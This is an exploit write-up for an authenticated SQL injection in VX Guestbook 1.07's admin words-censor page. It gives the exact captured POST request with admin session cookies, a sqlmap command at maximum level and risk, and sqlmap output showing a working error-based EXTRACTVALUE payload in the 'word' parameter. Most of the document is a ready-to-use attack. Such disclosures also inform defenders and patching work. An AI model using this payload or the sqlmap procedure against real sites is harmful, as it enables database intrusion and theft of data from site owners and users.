# Exploit Title: VX Guestbook SQL Injection Authenticated # Date: 2025-08-02 # Exploit Author: tmrswrr # Category : Webapps # Vendor: https://phpversion.com/ # Version 1.07 1. Access the Admin Panel: - Click Words Censor > https://127.0.0.1/VX_Guestbook/admin/words.php > Click Update - Catch Request POST /VX_Guestbook/admin/words.php HTTP/1.1 Host: 127.0.0.1 Cookie: admin_name=admin; admin_pass=1a1dc91c907325c69271ddf0c944bc72; _ga_YYDPZ3NXQQ=GS2.1.s1754162976$o6$g1$t1754163087$j9$l0$h0; _ga=GA1.1.797626112.1754131850; _gcl_au=1.1.1270393425.1754131851; AEFCookies1526[aefsid]=uoc6pbgy8qr8qbojj1y3tmlrm4u5vdcz; demo_75=%7B%22sid%22%3A75%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2F127.0.0.1%5C%2FVX_Guestbook%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2F127.0.0.1%5C%2FVX_Guestbook%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22%22%7D User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 27 Origin: http://127.0.0.1 Dnt: 1 Sec-Gpc: 1 Referer: http://127.0.0.1/VX_Guestbook/admin/words.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers Connection: keep-alive word=aaa&add_action=Update 2. sqlmap -r request.txt --batch --level 5 --risk 3 --thread 10 --dbms=mysql sqlmap identified the following injection point(s) with a total of 2342 HTTP(s) requests: --- Parameter: word (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: word=aaa' AND EXTRACTVALUE(1477,CONCAT(0x5c,0x7178626271,(SELECT (ELT(1477=1477,1))),0x71716a7071)) AND 'OPmT'='OPmT&add_action=Update --- [15:52:33] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.45, Apache back-end DBMS: MySQL >= 5.1